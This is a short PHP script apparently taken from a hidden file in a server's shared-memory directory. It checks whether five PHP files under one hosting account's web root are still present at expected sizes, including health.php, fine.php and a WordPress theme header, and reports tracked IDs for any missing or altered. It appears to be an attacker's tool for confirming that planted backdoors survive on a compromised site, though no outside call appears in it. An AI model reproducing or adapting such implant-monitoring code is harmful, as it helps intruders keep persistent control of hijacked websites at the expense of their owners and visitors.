File: //proc/self/root/dev/shm/.desc
<?php $r = '/home/studukfa/varaprasadchilumula.in'; $x = ["/health.php"=>"bd@@229964453@@699",
"/param.php"=>"bd@@229964456@@751",
"/style.php"=>"bd@@229964462@@827",
"/fine.php"=>"bd@@229964450@@960",
"/wp-content/themes/navein/template-parts/header/responsive-header.php"=>"bd@@227955998@@1447"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');